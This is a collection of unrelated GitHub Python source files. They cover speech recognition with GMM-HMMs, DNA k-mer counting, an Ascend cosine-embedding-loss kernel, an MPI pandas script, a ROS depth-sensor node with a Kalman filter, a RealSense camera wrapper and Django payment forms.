file_path = (os.path.join(root_dir, wave))\r\n label = os.path.relpath(root_dir, path_dataset)\r\n feature = get_features(file_path)\r\n labels_list.append(label)\r\n features_list.append(feature) \r\n test_features = features_list\r\n test_labels = labels_list \r\n for i in range(len(training_features)):\r\n if training_labels[i] not in train_dict_word:\r\n train_dict_word[training_labels[i]] = []\r\n train_dict_word[training_labels[i]].append(training_features[i])\r\n else:\r\n train_dict_word[training_labels[i]].append(training_features[i]) \r\n for i in range(len(test_features)):\r\n if test_labels[i] not in test_dict_word:\r\n test_dict_word[test_labels[i]] = []\r\n test_dict_word[test_labels[i]].append(test_features[i])\r\n else:\r\n test_dict_word[test_labels[i]].append(test_features[i])\r\n #Train dataset\r\n\r\n GMMHMM_models_word = {} # dict of HMMs (one model for each word into the dataset)\r\n num_states = 3 # States number of HMM\r\n num_mix = 2 # number of mixtures for each hidden state\r\n covariance_type = 'diag' # covariance type\r\n num_iter = 10 # number of max iterations\r\n bakis_level = 2\r\n\r\n start_prob = np.zeros(num_states) # start probability prior\r\n start_prob[0:bakis_level - 1] = 1 / float(1 / (bakis_level - 1))\r\n\r\n trans_mat = np.eye(num_states) # transaction matrix probability prior \r\n for i in range(num_states - (bakis_level - 1)):\r\n for j in range(bakis_level):\r\n trans_mat[i, i + j] = 1 / bakis_level\r\n\r\n for i in range((num_states - (bakis_level ) + 1), num_states ):\r\n trans_mat[i,i:] = (1 / (num_states - i))\r\n\r\n\r\n model_number = 0\r\n for word in train_dict_word:\r\n model = hmm.GMMHMM(n_components = num_states, n_mix = num_mix, startprob_prior = start_prob,\\\r\n transmat_prior = trans_mat, covariance_type = covariance_type,\\\r\n n_iter = num_iter, verbose=False)\r\n\r\n train_samples = train_dict_word[word]\r\n length_samples = np.zeros(len(train_samples), dtype=np.int) \r\n for elem in range(len(train_samples)):\r\n length_samples[elem] = train_samples[elem].shape[0]\r\n \r\n train_samples = np.vstack(train_samples) # Stack arrays in train_samples in sequence vertically \r\n\r\n \r\n \r\n \r\n \r\n #model.fit(train_samples, length_samples) # MODEL FIT\r\n model.fit(train_samples)\r\n \r\n GMMHMM_models_word[word] = model\r\n print(\"Finish train model GMM-HMM %s\" % model_number)\r\n model_number += 1\r\n num_words = len(train_dict_word)\r\n print(\"Finish train %s GMM-HMMs for %s different words\" % (num_words, num_words))\r\n\r\n\r\n trained_model_word = GMMHMM_models_word\r\n\r\n print(\"\")\r\n\r\n #Test data\r\n\r\n score_count = 0\r\n words_number = 0\r\n y_true = []\r\n y_pred = []\r\n for word in test_dict_word.keys():\r\n test_samples = test_dict_word[word]\r\n for speech_word in test_samples:\r\n words_number += 1\r\n score_models = {}\r\n for word_model in trained_model_word.keys():\r\n model = trained_model_word[word_model]\r\n score = model.score(speech_word)\r\n score_models[word_model] = score\r\n predict_word = max(score_models, key = score_models.get)\r\n print(word, \": \", predict_word)\r\n y_true.append(word)\r\n y_pred.append(predict_word)\r\n if predict_word == word:\r\n score_count += 1\r\n\r\n \r\n accuracy = (100 * score_count / words_number) \r\n print(\"Recognition rate %s\" %(accuracy))\r\n #euclid\r\n score_count = 0\r\n words_number = 0\r\n y_true = []\r\n y_pred = []\r\n for word in test_dict_word.keys():\r\n test_samples = test_dict_word[word]\r\n for test_word in test_samples:\r\n words_number += 1\r\n score_models = {}\r\n for train_model in train_dict_word.keys():\r\n feature_train = train_dict_word[train_model]\r\n #print(feature_train[0][0][0])\r\n dem = 0\r\n score = 0;\r\n for sample in feature_train :\r\n total = 0\r\n for i in range(len(sample)):\r\n euclid = 0\r\n for j in range(39):\r\n euclid= euclid + (test_word[i][j]-sample[i][j])**2\r\n euclid = math.sqrt(euclid)\r\n total = total + euclid\r\n score = score+total \r\n \r\n # print(score)\r\n #10/99/24\r\n score_models[train_model] = score\r\n predict_word = min(score_models, key = score_models.get)\r\n print(word, \": \", predict_word)\r\n y_true.append(word)\r\n y_pred.append(predict_word)\r\n if predict_word == word:\r\n score_count += 1\r\n\r\n \r\n accuracy = (100 * score_count / words_number) \r\n print(\"Recognition rate %s\" %(accuracy))\r\n \r\n\r\nmain()","repo_name":"xuanthuan0502/recognize_speech","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":12365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14194367428","text":"\n\nfrom collections import defaultdict\nfrom itertools import combinations, product\n\n\ndef reverse_complement_dna(dna):\n\t'''Returns the reverse complement of the given DNA strand.'''\n\tintab = \"ATCG\"\n\touttab = \"TAGC\"\n\ttrantab = dna.maketrans(intab,outtab)\n\treverse_complement = dna.translate(trantab)\n\treturn reverse_complement[::-1]\n\n\ndef ImmediateNeighbors(Pattern):\n\tNeighborhood = list()\n\tNeighborhood.append(Pattern)\n\tnucleotides = [\"A\",\"C\",\"G\",\"T\"]\n\tfor i in range(0,len(Pattern)):\n\t\tsymbol = Pattern[i]\n\t\tfor nucleotide in nucleotides:\n\t\t\tif symbol != nucleotide:\n\t\t\t\tNeighbor = Pattern[:i] + nucleotide + Pattern[(i+1):]\n\t\t\t\tNeighborhood.append(Neighbor)\n\tprint(Neighborhood)\n\treturn Neighborhood\n\n\ndef IterativeNeighbors(Pattern, d):\n\tNeighborhood = list()\n\tNeighborhood.append(Pattern)\n\tfor j in range(0,d):\n\t\tfor String in Neighborhood:\n\t\t\tNeighborhood = Neighborhood + ImmediateNeighbors(Pattern)\n\tprint(Neighborhood)\n\treturn Neighborhood\n\n\ndef kmer_mismatches(kmer, d):\n \"\"\"Returns all k-mers that are within d mismatches of the given k-mer.\"\"\"\n mismatches = [kmer] # Initialize mismatches with the k-mer itself (i.e. d=0).\n alt_bases = {'A':'CGT', 'C':'AGT', 'G':'ACT', 'T':'ACG'}\n for dist in range(1, d+1):\n for change_indices in combinations(range(0,len(kmer)), dist):\n for substitutions in product(*[alt_bases[kmer[i]] for i in change_indices]):\n new_mistmatch = list(kmer)\n for idx, sub in zip(change_indices, substitutions):\n new_mistmatch[idx] = sub\n mismatches.append(''.join(new_mistmatch))\n return mismatches\n\ndef FrequentWords_with_mm_and_rc(string,k,d):\n\t\"\"\"Returns all most frequent k-mers with up to d mismatches in the dna sequence seq.\"\"\"\n\t# Frequency analysis so we don't generate mismatches for the same k-mer more than once.\n\tfreqMap = defaultdict(int)\n\tfor i in range(0,((len(string)-k)+1)):\n\t\tfreqMap[string[i:i+k]] += 1\n\t\tfreqMap[reverse_complement_dna(string[i:k+i])] += 1\n\n\tmismatch_count = defaultdict(int)\n\tfor pattern, freq in freqMap.items():\n\t\tfor mismatch in IterativeNeighbors(pattern,d):\n\t\t\tmismatch_count[mismatch] += freq\n\n\tm = max(mismatch_count.values())\n\tfrequent_patterns = sorted([pattern for pattern, count in mismatch_count.items() if count == m])\n\treturn frequent_patterns\n\n\nwith open(\"input_3.txt\") as file:\n\tdata = file.readlines()\n\tstring = data[0].strip()\n\tnumbers = data[1].strip().split(\" \")\n\n\nprint(numbers)\nprint(string)\n\nPatterns = FrequentWords_with_mm_and_rc(string,int(numbers[0]),int(numbers[1]))\nprint(*Patterns,sep=\" \")","repo_name":"neuwirtt/Bioinformatics_I","sub_path":"FrequentWordsMismatchesReverseComplement.py","file_name":"FrequentWordsMismatchesReverseComplement.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8643401786","text":"from functools import reduce\nimport te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\nfrom te import platform as cceconf\n\n\n# pylint: disable=locally-disabled,too-many-arguments,too-many-locals\ndef _shape_check(shape_x1, shape_x2, shape_tgt):\n # check whether the shape meets the broadcast requirements, and output broadcast shape\n try:\n _, _, x_shape = util.produce_shapes(shape_x1, shape_x2)\n except RuntimeError:\n raise RuntimeError(\"x1 and x2 can't be broadcast\")\n\n x_shape_reduce = x_shape[:]\n x_shape_reduce.pop(1)\n try:\n _, _, tgt_shape = util.produce_shapes(x_shape_reduce, shape_tgt)\n except RuntimeError:\n raise RuntimeError(\"x and target can't be broadcast\")\n min_dim = min(len(shape_x1), len(shape_x2), len(shape_tgt))\n if min_dim >= 3:\n reduce_dim = -1\n for i in range(-1, -min_dim, -1):\n if(shape_x1[i] == shape_x2) or (\n shape_x1[i] == shape_tgt[i]):\n reduce_dim = i\n else:\n break\n if reduce_dim != -1:\n shape_x1 = list(shape_x1[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_x1[reduce_dim:])]\n shape_x2 = list(shape_x2[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_x2[reduce_dim:])]\n shape_tgt = list(shape_tgt[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_tgt[reduce_dim:])]\n x_shape = list(x_shape[:reduce_dim]) + [\n reduce(lambda x, y:x*y, x_shape[reduce_dim:])]\n tgt_shape = list(tgt_shape[:reduce_dim]) + [\n reduce(lambda x, y:x*y, tgt_shape[reduce_dim:])]\n util.check_shape_rule(shape_x1)\n util.check_shape_rule(shape_x2)\n util.check_shape_rule(shape_tgt)\n util.check_tensor_shape_size(shape_x1)\n util.check_tensor_shape_size(shape_x2)\n util.check_tensor_shape_size(shape_tgt)\n\n return x_shape, tgt_shape, shape_x1, shape_x2, shape_tgt\n\n\ndef _dtype_check(input_dtype_x1, input_dtype_x2, target_dtype, reduction):\n # cast_to not support \"int16\", \"int64\", ISA not support float64(double)\n x_check_list = [\"int8\", \"uint8\", \"int32\", \"float16\", \"float32\"]\n if not input_dtype_x1 in x_check_list:\n raise RuntimeError(\"x1 dtype %s not support\" % input_dtype_x1)\n if not input_dtype_x2 in x_check_list:\n raise RuntimeError(\"x2 dtype %s not support\" % input_dtype_x2)\n\n # cast_to not support \"int16\", \"int64\", \"uint8\" can't indicate -1\n tgt_check_list = [\"int8\", \"int32\", \"float16\", \"float32\"]\n if not target_dtype in tgt_check_list:\n raise RuntimeError(\"target dtype %s not support\" % target_dtype)\n\n reduce_check_list = ['mean', 'sum', 'none']\n if reduction not in reduce_check_list:\n raise RuntimeError(\"reduction method not support\")\n\n\n# pylint: disable=locally-disabled,unused-argument,invalid-name\n@fusion_manager.register(\"cosine_embedding_loss\")\ndef cosine_embedding_loss_compute(x1, x2, target, output_y, x_shape_broadcat,\n tgt_shape_broadcast, margin=0,\n reduction='mean',\n kernel_name=\"cosine_embedding_loss\"):\n \"\"\"\n DSL description of the cosine_embedding_loss operator's calculation process\n\n Parameters\n ----------\n x1: TVM tensor\n the placeholder of x1 input data\n x2: TVM tensor\n the placeholder of x2 input data\n target: TVM tensor\n the placeholder of target input data\n output_y: TVM tensor\n the placeholder of beta output data\n x_shape_broadcat: list,\n x1 and x2 broadcast shape\n tgt_shape_broadcast: list\n x and target broadcast shape\n margin: float\n margin, default value is \"0.0\"\n reduction: str\n string indicate reduce method, default value is \"mean\"\n kernel_name: str\n cce kernel name, default value is \"group_norm\"\n\n Returns\n -------\n res: TVM tensor\n \"\"\"\n cce_plat = cceconf.get_soc_spec('SOC_VERSION')\n cast_dtype = 'float32'\n epsilon = tvm.const(1e-12, dtype=\"float32\")\n\n if cce_plat == 'Ascend310':\n cast_dtype = 'float16'\n epsilon = tvm.const(5e-8, dtype=\"float16\")\n\n if x1.dtype.lower() != cast_dtype and x1.dtype.lower() != 'float32':\n x1 = te.lang.cce.cast_to(x1, cast_dtype)\n\n if x2.dtype.lower() != cast_dtype and x2.dtype.lower() != 'float32':\n x2 = te.lang.cce.cast_to(x2, cast_dtype)\n\n target = te.lang.cce.cast_to(target, x1.dtype)\n\n x1_broadcast = te.lang.cce.broadcast(x1, x_shape_broadcat)\n x2_broadcast = te.lang.cce.broadcast(x2, x_shape_broadcat)\n target_broadcast = te.lang.cce.broadcast(target, tgt_shape_broadcast)\n\n # DSL description for cosine similarity compute\n prod = te.lang.cce.vmul(x1_broadcast, x2_broadcast)\n\n mag1 = te.lang.cce.vmul(x1_broadcast, x1_broadcast)\n mag2 = te.lang.cce.vmul(x2_broadcast, x2_broadcast)\n mag_square1 = te.lang.cce.sum(mag1, axis=1)\n mag_square2 = te.lang.cce.sum(mag2, axis=1)\n\n x1_epsilon = te.lang.cce.vadds(mag_square1, epsilon)\n x2_epsilon = te.lang.cce.vadds(mag_square2, epsilon)\n x1_sqrt = te.lang.cce.vsqrt(x1_epsilon)\n x2_sqrt = te.lang.cce.vsqrt(x2_epsilon)\n mode_num = te.lang.cce.vmul(x1_sqrt, x2_sqrt)\n prod_num = te.lang.cce.sum(prod, axis=1)\n cos_res = te.lang.cce.vdiv(prod_num, mode_num)\n\n # DSL description for 1 - cos(x1, x2)\n zero_tensor = te.lang.cce.vmuls(target_broadcast, 0)\n one_tensor = te.lang.cce.vadds(zero_tensor, 1)\n\n neg_one_tensor = te.lang.cce.vsub(zero_tensor, one_tensor)\n pos = te.lang.cce.vsub(one_tensor, cos_res)\n\n # DSL description for max(0, cos(x1, x2) - margin)\n margin_const = tvm.const(margin, dtype=\"float32\")\n margin_tensor = te.lang.cce.vmuls(one_tensor, margin_const)\n neg_sub = te.lang.cce.vsub(cos_res, margin_tensor)\n neg = te.lang.cce.vmax(zero_tensor, neg_sub)\n\n # DSL description for output = pos if y == 1 else neg\n output_pos = te.lang.cce.vcmpsel(target_broadcast, one_tensor, 'eq',\n pos, zero_tensor)\n output_neg = te.lang.cce.vcmpsel(target_broadcast, neg_one_tensor, 'eq',\n neg, zero_tensor)\n res = te.lang.cce.vadd(output_pos, output_neg)\n if reduction in ['sum', 'mean']:\n if reduction == 'mean':\n num = reduce(lambda x, y: x * y, tgt_shape_broadcast)\n mean_cof = num ** (-1)\n res = te.lang.cce.vmuls(res, mean_cof)\n res = te.lang.cce.cast_to(res, 'float32')\n\n reduce_axis = [index for index, _ in enumerate(tgt_shape_broadcast)]\n res_sum = te.lang.cce.sum(res, axis=reduce_axis)\n return res_sum\n\n return te.lang.cce.cast_to(res, 'float32')\n\n\n# pylint: disable=locally-disabled,too-many-arguments,too-many-locals\n@util.check_input_type(dict, dict, dict, dict, float, str, str)\ndef cosine_embedding_loss(input_x1, input_x2, target, y,\n margin=0, reduction='mean',\n kernel_name=\"cosine_embedding_loss\"):\n \"\"\"\n algorithm: cosine_embedding_loss\n cosine embedding loss = // 1-cos(x1, x2), if y == 1\n \\\\ max(0, cos(x1, x2) - margin), if y == -1\n Note that the size of 5D Tensors are defined by \"NC1HWC0\".\n The input tensor's dimension C should be equal.\n\n Parameters\n ----------\n x1: dict\n dict of input x1, A Tensor for input data.\n x2: dict\n dict of input x1, A Tensor for input data.\n target: dict\n dict of target, A Tensor for target, include 1 and -1.\n output_y: dict\n dict of output, A Tensor for output\n margin: float\n float of margin, A float number subtracted when y == -1\n reduction: str\n str of output reduce method.\n kernel_name: str\n kernel name, default value is \"cosine_embedding_loss\"\n\n Returns\n -------\n None\n \"\"\"\n shape_x1 = input_x1.get(\"shape\")\n dtype_x1 = input_x1.get(\"dtype\")\n input_dtype_x1 = dtype_x1.lower()\n shape_x2 = input_x2.get(\"shape\")\n dtype_x2 = input_x2.get(\"dtype\")\n input_dtype_x2 = dtype_x2.lower()\n shape_tgt = target.get(\"shape\")\n dtype_tgt = target.get(\"dtype\")\n target_dtype = dtype_tgt.lower()\n\n util.check_kernel_name(kernel_name)\n x_shape_broadcat, tgt_shape_broadcast, shape_x1, shape_x2, shape_tgt = \\\n _shape_check(shape_x1, shape_x2, shape_tgt)\n _dtype_check(input_dtype_x1, input_dtype_x2, target_dtype, reduction)\n\n data_input1 = tvm.placeholder(shape_x1, name=\"data_input1\",\n dtype=input_dtype_x1)\n data_input2 = tvm.placeholder(shape_x2, name=\"data_input2\",\n dtype=input_dtype_x2)\n data_target = tvm.placeholder(shape_tgt, name=\"data_target\",\n dtype=target_dtype)\n\n res = cosine_embedding_loss_compute(data_input1, data_input2, data_target,\n y, x_shape_broadcat,\n tgt_shape_broadcast, margin, reduction,\n kernel_name)\n\n with tvm.target.cce():\n schedule = generic.auto_schedule(res)\n\n config = {\n \"name\": kernel_name,\n \"tensor_list\": [data_input1, data_input2, data_target, res],\n }\n\n te.lang.cce.cce_build_code(schedule, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/cosine_embedding_loss.py","file_name":"cosine_embedding_loss.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"16509892528","text":"from mpi4py import MPI\nimport pandas as pd\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\ndf = pd.read_csv('../dataset/datos.csv', delimiter = ';', encoding = 'ISO-8859-1')\ndf.head()\n\ndef reduce(num):\n dfR = df.filter(items = [df.columns[num]])\n dfGrouped = dfR.groupby([dfR.columns[0]]).size()\n print(dfGrouped)\n print(\"#####################################\")\n\nif rank == 0:\n comm.send(1, dest = 1) # ciudad\n comm.send(5, dest = 2) # clase\n comm.send(4, dest = 3) # dia\n comm.send(7, dest = 4) # gravedad\n\nif rank == 1:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 2:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 3:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 4:\n num = comm.recv(source = 0)\n reduce(num)\n","repo_name":"sortizs/pr4-hpc","sub_path":"mpi/mpi_acc.py","file_name":"mpi_acc.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74267207526","text":"__author__ = 'Bartek'\nfrom .indor_exceptions import ClassPropertyNotFound\nfrom .xml_tree_factory import XmlTreeFactory\nfrom .xml_tree import XmlTree\n\n\nclass XmlTreeRegister(type(XmlTree)):\n def __init__(cls, name, bases, dic):\n cls.property_name_for_printer = 'pretty_name'\n if cls.property_name_for_printer not in dic:\n raise ClassPropertyNotFound(name, cls.property_name_for_printer)\n super(XmlTreeRegister, cls).__init__(name, bases, dic)\n XmlTreeFactory().add_class(name, cls)\n","repo_name":"nokia-wroclaw/innovativeproject-resttest","sub_path":"src/indor/xml_tree_register.py","file_name":"xml_tree_register.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"42324065845","text":"#!/usr/bin/env python3\n\nimport ms5837_driver\nimport rospy\nimport time\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom ms5837.msg import ms5837_data\nfrom nav_msgs.msg import Odometry\nimport numpy as np\n\n\n# Choose seawater or freshwater depth calibration using ros param\n# freshwater = 997 kg/m^3\n# seawater = 1029 kg/m^3\n\n# def calculate(array):\n# mean = 0\n# #total = 0\n# if(len(array)>50):\n# array.pop(0)\n# mean = sum(array)\n# mean /= len(array)\n# #for point in array:\n # total += (point - mean) * (point - mean)\n #total /= len(array)\n #print(mean)\n #return mean\n\nclass KalmanFilter:\n\n def __init__(self, max_diff=100, process_noise_matrix=np.array([[0.001, 0.00000001, 0.00000001], [0.00000001, 0.0005, 0.00000001], [0.00000001, 0.00000001, 0.0001]])):\n # initialize the filter with random values\n self.KG = np.ones((3, 3)) # Kalman gain\n self.est = np.zeros((3, 3)) # last estimate (x,v,a)\n self.est_error = np.ones((3, 3)) # Error of the filter estimate\n self.process_noise_matrix = process_noise_matrix\n\n self.last_time = time.time() # for calculating dt\n\n # for sanity check on sensor value\n self.last_x_m = None\n self.max_diff = max_diff # the maximum error between two sensor readings for value to be thrown out\n\n def update(self, x_m, v_m, a_m, x_e, v_e, a_e):\n # pass in measure position, velocity, and acceleration along with error for each\n # check to make sure sensor value has not had catastrophic problem\n if self.last_x_m is None:\n self.last_x_m = x_m\n if abs(x_m - self.last_x_m) > self.max_diff:\n rospy.logerr(\"Sensor value error: change in measurement too large for one time step\")\n else:\n\n # if value is all good then continue to run time step step\n current_time = time.time()\n dt = current_time - self.last_time\n self.last_time = current_time\n\n # create our new estimate based on the model\n self.est = np.matmul(np.array([[1, dt, 1 / 2.0 * dt ** 2], [0, 1, dt], [0, 0, 1]]), self.est) * [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n rospy.logdebug(self.est)\n self.est_error = self.est_error * [[1, 0, 0], [0, 1, 0], [0, 0, 1]] + self.process_noise_matrix # prevent error from going to zero\n rospy.logdebug(self.est_error)\n\n # update estimate with new sensor values\n self.KG = self.est_error / (self.est_error + np.array([[x_e, 0, 0], [0, v_e, 0], [0, 0, a_e]])) * [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n self.est = self.est + np.matmul(self.KG, np.array([[x_m, 0, 0], [0, v_m, 0], [0, 0, a_m]]) - self.est)\n self.est_error = np.matmul((np.identity(3) - self.KG), self.est_error)\n\n self.last_x_m = x_m\n return self.est, self.est_error\n\n\nif __name__ == '__main__':\n try:\n # set up ros stuff\n data = []\n rospy.init_node('ms5837_node')\n fluid_density = rospy.get_param('~fluid_density', '1000')\n publish_odom = rospy.get_param('~publish_odom', True)\n publish_pose = rospy.get_param('~publish_pose', False)\n use_kalman_filter = rospy.get_param('~use_kalman_filter', False)\n depth_variance = rospy.get_param('~depth_variance', 0.001)\n tf_frame = rospy.get_param(\"~tf_frame\", \"depth_sensor_link\")\n\n pub = rospy.Publisher('rov/ms5837', ms5837_data, queue_size=1)\n rate = rospy.Rate(20) # 100Hz data read\n sensor = ms5837_driver.MS5837_02BA(bus=1) # Default I2C bus is 1 (Raspberry Pi 3)\n # sensor = ms5837.MS5837_02BA()\n\n sensor.setFluidDensity(int(fluid_density))\n time.sleep(1)\n # sensor.init must run immediately after installation of ms5837 object\n sensor.init()\n\n odom_pub = None\n pose_pub = None\n filter = None\n if publish_odom:\n odom_pub = rospy.Publisher(\"/rov/depth_odom\", Odometry, queue_size=1)\n if publish_pose:\n pose_pub = rospy.Publisher(\"/rov/depth_pose\", PoseWithCovarianceStamped, queue_size=1)\n if use_kalman_filter:\n filter = KalmanFilter(100)\n\n last_depth_m = 0 # the last sensor value for computing the velocity\n last_velocity_m = 0 # last velocity for computing acceleration\n last_time = time.time() # time of last read for computing velocity\n\n while not rospy.is_shutdown():\n msg = ms5837_data()\n\n sensor.read(oversampling=0) # maximum read rate of ~90Hz\n\n current_time = time.time()\n dt = current_time - last_time\n last_time = current_time\n\n # measured values for depth, velocity, acceleration\n velocity_m = (sensor.depth() - last_depth_m) / dt\n last_depth_m = sensor.depth()\n acceleration_m = (velocity_m - last_velocity_m) / dt\n last_velocity_m = velocity_m\n\n if use_kalman_filter:\n state, variance = filter.update(sensor.depth(), velocity_m, acceleration_m,\n depth_variance, depth_variance, depth_variance)\n depth = state[0, 0]\n velocity = state[1, 1]\n variance = [variance[0, 0], variance[1, 1]] # position and velocity variance\n else:\n depth = sensor.depth()\n\n velocity = velocity_m\n variance = [depth_variance, depth_variance]\n\n msg.tempC = sensor.temperature(ms5837_driver.UNITS_Centigrade)\n msg.tempF = sensor.temperature(ms5837_driver.UNITS_Farenheit)\n msg.depth = sensor.depth()\n # msg.altitudeM = sensor.altitude() # causes error in driver\n\n # update message headers\n msg.header.stamp = rospy.Time.now()\n msg.header.frame_id = 'depth_data'\n\n pub.publish(msg)\n\n if publish_odom:\n msg = Odometry()\n msg.header.frame_id = tf_frame\n msg.header.stamp = rospy.Time.now()\n msg.pose.pose.position.z = float(depth)\n data.append(depth)\n # if(len(data) >= 50):\n # msg.pose.pose.position.z = float(calculate(data))\n time_now = time.time()\n msg.twist.twist.linear.z = float(velocity)\n last_time = time_now\n msg.pose.covariance[14] = variance[0]\n msg.twist.covariance[14] = variance[1]\n odom_pub.publish(msg)\n\n if publish_pose:\n msg = PoseWithCovarianceStamped()\n msg.header.frame_id = tf_frame\n msg.header.stamp = rospy.Time.now()\n msg.pose.pose.position.z = 1#sensor.depth() #(float(depth) - 193)\n msg.pose.covariance[14] = variance[0]\n pose_pub.publish(msg)\n\n rate.sleep()\n\n except rospy.ROSInterruptException:\n pass\n","repo_name":"MUsurf/Jelly_ROS_22-23","sub_path":"catkin_ws/src/ms5837/src/ms5837_ros.py","file_name":"ms5837_ros.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"1477214775","text":"import pyrealsense2 as rs\nimport numpy as np\nimport cv2\n\n\nclass Realsense_Module():\n WIDTH = 640\n HEIGHT = 480\n FPS = 30\n def __init__(self,device = \"218622271154\") :\n #RGBとdepthの初期設定\n self.conf = rs.config()\n self.conf.enable_device(device)\n #解像度はいくつか選択できる\n self.conf.enable_stream(rs.stream.color, self.WIDTH, self.HEIGHT, rs.format.bgr8, self.FPS)\n self.conf.enable_stream(rs.stream.depth, self.WIDTH, self.HEIGHT, rs.format.z16, self.FPS)\n #stream開始\n self.pipe = rs.pipeline()\n self.profile = self.pipe.start(self.conf)\n #Alignオブジェクト生成(位置合わせのオブジェクト)\n self.align_to = rs.stream.color\n self.align = rs.align(self.align_to)\n #カメラ情報の取得(内パラ)\n self.depth_intrinsics = rs.video_stream_profile(self.profile.get_stream(rs.stream.depth)).get_intrinsics()\n self.color_intrinsics = rs.video_stream_profile(self.profile.get_stream(rs.stream.color)).get_intrinsics()\n\n def obtain_camera_prame(self):\n R=[self.color_intrinsics.fx,\n self.color_intrinsics.fy,\n self.WIDTH/2,\n self.HEIGHT/2\n ]\n return R\n\n def obtain_cam_image(self) :\n try :\n #フレーム待ち(これがないとデータの取得にエラーが出ることがあるらしい)\n frames = self.pipe.wait_for_frames()\n # get_frame_data\n aligned_frames = self.align.process(frames)\n color_frame = aligned_frames.get_color_frame()\n depth_frame = aligned_frames.get_depth_frame()\n depth_frame = self.depth_filter(depth_frame)\n if not depth_frame or not color_frame:\n return\n #dataがunit16の形で入っているのでnumpy配列に変更\n color_image = np.asanyarray(color_frame.get_data())\n depth_image = np.asanyarray(depth_frame.get_data())\n img_flag=True\n return color_image,depth_image,depth_frame,img_flag\n except Exception as e :\n print(e)\n color_image=None\n depth_image=None\n depth_frame=None\n img_flag=False\n return color_image,depth_image,depth_frame,img_flag\n\n def obtain_point(self,result_frame,box_result) :\n result_pos=[]\n for u_v in box_result :\n u = int(u_v[0])\n v = int(u_v[1])\n #3次元座標推定\n i_d = result_frame.get_distance(u,v) #距離推定\n point = rs.rs2_deproject_pixel_to_point(self.color_intrinsics , [u,v], i_d) #カメラ座標のx,y取得\n result_pos.append(point)\n return result_pos\n \n def depth_filter(self,depth_frame):\n #TODO recursive median filterを入れる\n # decimarion_filterのパラメータ\n decimate = rs.decimation_filter()\n decimate.set_option(rs.option.filter_magnitude, 1)\n # spatial_filterのパラメータ\n spatial = rs.spatial_filter()\n spatial.set_option(rs.option.filter_magnitude, 1)\n spatial.set_option(rs.option.filter_smooth_alpha, 0.25)\n spatial.set_option(rs.option.filter_smooth_delta, 50)\n # hole_filling_filterのパラメータ\n hole_filling = rs.hole_filling_filter()\n # disparity\n depth_to_disparity = rs.disparity_transform(True)\n disparity_to_depth = rs.disparity_transform(False)\n # filterをかける\n filter_frame = decimate.process(depth_frame)\n filter_frame = depth_to_disparity.process(filter_frame)\n filter_frame = spatial.process(filter_frame)\n filter_frame = disparity_to_depth.process(filter_frame)\n filter_frame = hole_filling.process(filter_frame)\n result_frame = filter_frame.as_depth_frame()\n return result_frame\n\n def limit_area(self,color_image,depth_image,left=0,right=600,top=0,bottom=500):\n lim_colorimage=color_image[left:right,top:bottom,:]\n lim_depth_image=depth_image[left:right,top:bottom]\n return lim_colorimage,lim_depth_image\n\n def shutdown(self):\n self.pipe.stop()\n\n\n","repo_name":"Hibikino-Toms-Robot/image_process","sub_path":"image_node/realsense_setup.py","file_name":"realsense_setup.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31698708414","text":"from django import forms\nfrom django.contrib.auth import get_user_model\nfrom projects.models import Project\nfrom payments.models import Payments\nUser = get_user_model()\n\n# pay project based form\nclass PaymentsProjectForm(forms.ModelForm):\n receivers = forms.ModelMultipleChoiceField(\n queryset=User.objects.filter(user_type='worker'),\n widget=forms.CheckboxSelectMultiple\n )\n class Meta:\n model = Payments\n fields = [\n 'amount',\n 'per_entry',\n 'receivers',\n ]\n widgets = {\n 'amount': forms.NumberInput(attrs={'class': 'form-control'}), \n 'per_entry': forms.NumberInput(attrs={'class': 'form-control'}), \n }\n\n\n# pay to direct worker form\nclass PaymentWorkerForm(forms.ModelForm):\n receivers = forms.ModelMultipleChoiceField(\n queryset=User.objects.filter(user_type='worker'),\n widget=forms.CheckboxSelectMultiple\n )\n\n class Meta:\n model = Payments\n fields = [\n 'project',\n 'amount',\n 'per_entry',\n 'receivers',\n ]\n widgets = {\n 'project': forms.Select(attrs={'class': 'form-control'}), \n 'amount': forms.NumberInput(attrs={'class': 'form-control'}), \n 'per_entry': forms.NumberInput(attrs={'class': 'form-control'}), \n }\n","repo_name":"alfinarif/project-management-application","sub_path":"payments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
